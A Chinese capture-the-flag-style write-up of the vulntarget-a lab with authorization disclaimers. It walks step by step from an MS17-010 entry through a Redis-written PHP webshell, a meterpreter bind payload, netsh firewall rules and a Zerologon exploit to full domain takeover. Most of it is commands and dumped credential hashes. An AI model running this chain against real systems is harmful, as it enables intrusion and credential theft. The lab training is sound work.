【永久开源】vulntarget-a 打靶记录
✎ 阅读须知
乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
乌鸦安全拥有对此文章的修改、删除和解释权限,如转载或传播此文章,需保证文章的完整性,未经允许,禁止转载!
本文所提供的工具仅用于学习,禁止用于其他,请在24小时内删除工具文件!!!
本文作者:夏天 本文已获得作者授权
vuntarget免责声明
vulntarget靶场系列仅供安全专业人员练习渗透测试技术,此靶场所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用靶场中的技术资料对任何计算机系统进行入侵操作。利用此靶场所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
vulntarget靶场系列拥有对此靶场系列的的修改、删除和解释权限,未经授权,不得用于其他。
vulntarget地址:
https://github.com/crow821/vulntarget
欢迎多多star🌟
vulntarget搭建系列
vulntarget漏洞靶场系列(二)— vulntarget-b
vulntarget漏洞靶场系列(三)— vulntarget-c
1. 拓扑图
靶场下载地址
链接: https://pan.baidu.com/s/195iUmvbaKOhtn2S_O-F6TA 提取码: jnkq入口 192.168.0.4
kali 192.168.0.35
2. 第一层
2.1 端口扫描
nmap扫描一下开了扫描端口
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -sV -sC 192.168.0.4 -p- -T4 -v
Host is up (0.00083s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http nginx
| http-methods:
|_ Supported Methods: GET HEAD POST
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: \xCD\xA8\xB4\xEFOA\xCD\xF8\xC2\xE7\xD6\xC7\xC4\xDC\xB0\xEC\xB9\xAB\xCF\xB5\xCD\xB3
|_http-favicon: Unknown favicon MD5: 1205AF91D6B1638C23DE1132AE0C7E0B
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: WIN7-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -2h40m00s, deviation: 4h37m07s, median: 0s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: win7-PC
| NetBIOS computer name: WIN7-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-01-26T09:56:17+08:00
| smb2-security-mode:
| 2.1:
|_ Message signing enabled but not required
| nbstat: NetBIOS name: WIN7-PC, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:24:f0:bb (VMware)
| Names:
| WIN7-PC<00> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| WIN7-PC<20> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
|_ \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2022-01-26T01:56:17
|_ start_date: 2022-01-26T01:49:34开了SMB服务可以尝试ms17-010扫描
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap --script=vuln 192.168.0.4 -p 445,135,139 -T4 -v
Host is up (0.0011s latency).
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_smb-vuln-ms10-054: false
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIEDnmap扫到了ms17-010漏洞,还开了80端口
2.2 通达OAgetshell
http://192.168.0.4/rA4WmWb.php
密码:x蚁剑连接直接system权限
2.3 MS17-010漏洞
扫描存在
获取密码
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain LM NTLM SHA1
-------- ------ -- ---- ----
win7 win7-PC f0d412bd764ffe81aad3b435b51404ee 209c6174da490caeb422f3fa5a7ae634 7c87541fd3f3ef5016e12d411900c87a6046a8e8
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
WIN7-PC$ WORKGROUP (null)
win7 win7-PC admin
tspkg credentials
=================
Username Domain Password
-------- ------ --------
win7 win7-PC admin
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
win7 win7-PC admin
win7-pc$ WORKGROUP (null)发现内网网段10.0.20.98
自动迁移进程,添加路由
meterpreter > run post/windows/manage/migrate
[!] SESSION may not be compatible with this module:
[!] * missing Meterpreter features: stdapi_sys_process_set_term_size
[*] Running module against WIN7-PC
[*] Current server process: spoolsv.exe (1128)
[*] Spawning notepad.exe process to migrate into
[*] Spoofing PPID 0
[*] Migrating into 3728
[+] Successfully migrated into process 3728
meterpreter > run post/multi/manage/autoroute
[!] SESSION may not be compatible with this module:
[!] * incompatible session platform: windows
[*] Running module against WIN7-PC
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.0.20.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 192.168.0.0/255.255.255.0 from host's routing table.3. 横向第二台机器
扫描10.0.20.0/24网段
use auxiliary/scanner/portscan/tcp
set ports 22,23,80,443,8080,8081,3389,445,143,6379
set rhosts 10.0.20.0/24
set threads 20
run
已知98是我们拿下的win7 99开了80和6379 开启msf的socks5
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.
[*] Starting the SOCKS proxy server扫一下目录
python3 dirsearch.py -u "http://10.0.20.99/" --proxy=socks5://localhost:1080
得到的web目录
C:\phpStudy\PHPTutorial\WWW\phpinfo.php
没什么可看的 测试一下6379,发现未授权
windows,不出网,就写webshell吧
┌──(kali㉿kali)-[~]
└─$ proxychains4 redis-cli -h 10.0.20.99
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.15
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.0.20.99:6379 ... OK
10.0.20.99:6379> config set dir "C:/phpStudy/PHPTutorial/WWW/"
OK
10.0.20.99:6379> config set dbfilename xt.php
OK
10.0.20.99:6379> set 1 "<?php @eval($_POST['xt']);?>"
OK
10.0.20.99:6379> save
OK
蚁剑连接
image.png
quser:发现win2016用户在线 ipconifg /all:域名 vulntarget.com 另外一个内网IP 10.0.10.111
tasklist查看进程,查杀软,存在Windows Defender
正向上线msf
生成shellcode
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=8091 -f exe > 8091_bind.exe监听配置
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/x64/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LPORT 8091 yes The listen port
RHOST 10.0.20.99 no The target address
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > run
[*] Started bind TCP handler against 10.0.20.99:8091
后门运行,但迟迟没有上线,可能就是防火墙开了
添加防火墙入站规则
netsh advfirewall firewall add rule name="bind tcp" protocol=TCP dir=in localport=8091 action=allow
重新运行运行,恭喜上线成功
加载kiwi 随机切换一个进程
查看HTLM
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
meterpreter > run post/windows/manage/migrate
[!] SESSION may not be compatible with this module:
[!] * missing Meterpreter features: stdapi_sys_process_set_term_size
[*] Running module against WIN2016
[*] Current server process: 8091_bind.exe (676)
[*] Spawning notepad.exe process to migrate into
[*] Spoofing PPID 0
[*] Migrating into 1764
[+] Successfully migrated into process 1764
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain NTLM SHA1 DPAPI
-------- ------ ---- ---- -----
WIN2016$ VULNTARGET aabc352125765ee443568d0cdf27d62a 0aeb385e9aa49fa7e0be911d3b17da00f2aa7acd
WIN2016$ VULNTARGET e0cd419213811fd910ca6c3c42d764e7 cd721f807e68ce07a4d0fe80b9356e93986d5ef1
win2016 VULNTARGET dfc8d2bfa540a0a6e2248a82322e654e cfa10f59337120a5ea6882b11c1c9f451f5f4ea6 27bd7cc4802079a6e008ed2d917c4323
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
WIN2016$ VULNTARGET (null)
win2016 VULNTARGET (null)
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
WIN2016$ vulntarget.com NDjm,P3trN$LQ-$cZ9bE<VNzB$JaIR4>T+JNW7Qk?gHpDo(+H>zF^t-gG>,0MmLMBzfZ^ ]/oRL*<>j,WTp+5yF2cA.d%b>^:n/Bmf64:Qx.:/s5Y1">5>wZ
WIN2016$ vulntarget.com c2 3e 11 5a 0e 59 54 f0 7c 60 e0 46 1a ab 19 68 4b a3 44 b4 0c 38 a7 ac 2a 67 ad 5d b9 ee 1b cc e4 5d 82 53 8e 21 d1 8c 7e 3a cb 06 e2 04 6a 2e 4d 35 5a a2 64 c3 85 4c a3 e2 84 9f 30 eb 02 20 3c ba 44 f0 e2 3f
27 ba 60 3b 91 d5 fa 53 fc 5b ae 4a c8 99 42 42 40 43 8b 35 43 cf 9c bb 10 7a dd 63 72 f6 ba 6c 7a 6b 42 fd 87 6e 76 d4 b4 71 78 4f 27 8f 26 a9 ae 63 c2 b0 dd 5e 20 21 ad 4e 4e 1d 71 5b 1a 14 e6 6f 85 ab 45 3
8 10 3a f5 ae fb 41 9b a9 bd a5 01 c7 d2 f1 36 42 ba 98 3b 41 7a 02 79 aa f2 cf 28 d1 f8 ab 4a 30 14 0c fe 6c 21 6f ec 5f 15 31 e8 6e 1c fd b0 b4 a6 a7 cc c3 f3 5a c3 51 98 54 31 5c 58 2f 01 f7 22 10 11 1b 31
91 fa 1a 35 8d 11 e9 c1 50 6c dc f8 c5 16 ad f4 ba 1c ed 5c fc f2 04 24 c8 d6 40 8f ac 87 f5
win2016 VULNTARGET.COM (null)
win2016$ VULNTARGET.COM (null)
win2016$ VULNTARGET.COM c2 3e 11 5a 0e 59 54 f0 7c 60 e0 46 1a ab 19 68 4b a3 44 b4 0c 38 a7 ac 2a 67 ad 5d b9 ee 1b cc e4 5d 82 53 8e 21 d1 8c 7e 3a cb 06 e2 04 6a 2e 4d 35 5a a2 64 c3 85 4c a3 e2 84 9f 30 eb 02 20 3c ba 44 f0 e2 3f
27 ba 60 3b 91 d5 fa 53 fc 5b ae 4a c8 99 42 42 40 43 8b 35 43 cf 9c bb 10 7a dd 63 72 f6 ba 6c 7a 6b 42 fd 87 6e 76 d4 b4 71 78 4f 27 8f 26 a9 ae 63 c2 b0 dd 5e 20 21 ad 4e 4e 1d 71 5b 1a 14 e6 6f 85 ab 45 3
8 10 3a f5 ae fb 41 9b a9 bd a5 01 c7 d2 f1 36 42 ba 98 3b 41 7a 02 79 aa f2 cf 28 d1 f8 ab 4a 30 14 0c fe 6c 21 6f ec 5f 15 31 e8 6e 1c fd b0 b4 a6 a7 cc c3 f3 5a c3 51 98 54 31 5c 58 2f 01 f7 22 10 11 1b 31
91 fa 1a 35 8d 11 e9 c1 50 6c dc f8 c5 16 ad f4 ba 1c ed 5c fc f2 04 24 c8 d6 40 8f ac 87 f5
meterpreter > 
win2016的密码Admin#123
查看域控制器计算机名
net group "domain controllers" /domain
WIN2019
查看域管理员
net group "enterprise admins" /domain
administrator
ping域控制器主机名称得到IP地址10.0.10.110
添加路由
4. CVE-2020-1472提权到域控
因为只是域普通用户,直接上1472漏洞
密码置空,使用secretdump获取域控上的hash
┌──(kali㉿kali)-[~/Desktop/CVE-2020-1472/EXP]
└─$ proxychains4 python3 cve-2020-1472-exploit.py WIN2019 10.0.10.110
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.15
Performing authentication attempts...
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.0.10.110:135 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.0.10.110:49674 ... OK
======================================================================================================
Target vulnerable, changing account password to empty string
Result: 0
Exploit complete!得到administrator域管理员的hash
┌──(kali㉿kali)-[~/Desktop/impacket-0.9.24/examples]
└─$ proxychains4 python3 secretsdump.py vulntarget.com/WIN2019\$@10.0.10.110 -just-dc -no-pass 127 ⨯
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.15
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.0.10.110:445 ... OK
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.0.10.110:135 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.0.10.110:49667 ... OK
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a3dd8e4a352b346f110b587e1d1d1936:::
vulntarget.com\win2016:1601:aad3b435b51404eeaad3b435b51404ee:dfc8d2bfa540a0a6e2248a82322e654e:::
WIN2019$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN2016$:1602:aad3b435b51404eeaad3b435b51404ee:aabc352125765ee443568d0cdf27d62a:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:70a1edb09dbb1b58f1644d43fa0b40623c014b690da2099f0fc3a8657f75a51d
Administrator:aes128-cts-hmac-sha1-96:04c435638a00755c0b8f12211d3e88a1
Administrator:des-cbc-md5:dcc29476a789ec9e
krbtgt:aes256-cts-hmac-sha1-96:f7a968745d4f201cbeb73f4b1ba588155cfd84ded34aaf24074a0cfe95067311
krbtgt:aes128-cts-hmac-sha1-96:f401ac35dc1c6fa19b0780312408cded
krbtgt:des-cbc-md5:10efae67c7026dbf
vulntarget.com\win2016:aes256-cts-hmac-sha1-96:e4306bef342cd8215411f9fc38a063f5801c6ea588cc2fee531342928b882d61
vulntarget.com\win2016:aes128-cts-hmac-sha1-96:6da7e9e046c4c61c3627a3276f5be855
vulntarget.com\win2016:des-cbc-md5:6e2901311c32ae58
WIN2019$:aes256-cts-hmac-sha1-96:092c877c3b20956347d535d91093bc1eb16b486b630ae2d99c0cf15da5db1390
WIN2019$:aes128-cts-hmac-sha1-96:0dca147d2a216089c185d337cf643e25
WIN2019$:des-cbc-md5:01c8894f541023bc
WIN2016$:aes256-cts-hmac-sha1-96:64e86893159e2f036ee7d9a7a8312dfa9e2ab3b1435dcad3d372cac3d3530b54
WIN2016$:aes128-cts-hmac-sha1-96:efe65cbd2f33250e1f5d0baad8fa8719
WIN2016$:des-cbc-md5:911657540e94079b
[*] Cleaning up...
成功访问域控
┌──(kali㉿kali)-[~/Desktop/impacket-0.9.24/examples]
└─$ proxychains4 python3 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 administrator@10.0.10.110 1 ⨯
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.15
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.0.10.110:445 ... OK
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>hostname
win2019
C:\Windows\system32>破解hash密码
Admin@666 秒出 !!!!
─(kali㉿kali)-[~/Desktop]
└─$ john --wordlist=./pass.txt ./winhash.txt --format=NT 1 ⨯
Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
Admin@666 (Administrator)
1g 0:00:00:00 DONE (2022-01-26 01:58) 100.0g/s 508800p/s 508800c/s 508800C/s admin333..Admin99
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed. 开启3389,防火墙放行3389,连接
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
准备上线msf 还是开了防火墙先做规则
netsh advfirewall firewall add rule name="bind tcp" protocol=TCP dir=in localport=8091 action=allow
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2022/01/26 23:37:23,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录
相关产品与服务
网站渗透测试
网站渗透测试(Website Penetration Test,WPT)是完全模拟黑客可能使用的攻击技术和漏洞发现技术,对目标系统的安全做深入的探测,发现系统最脆弱的环节。渗透测试和黑客入侵最大区别在于渗透测试是经过客户授权,采用可控制、非破坏性质的方法和手段发现目标和网络设备中存在弱点,帮助管理者知道自己网络所面临的问题,同时提供安全加固意见帮助客户提升系统的安全性。腾讯云网站渗透测试由腾讯安全实验室安全专家进行,我们提供黑盒、白盒、灰盒多种测试方案,更全面更深入的发现客户的潜在风险。
腾讯云开发者
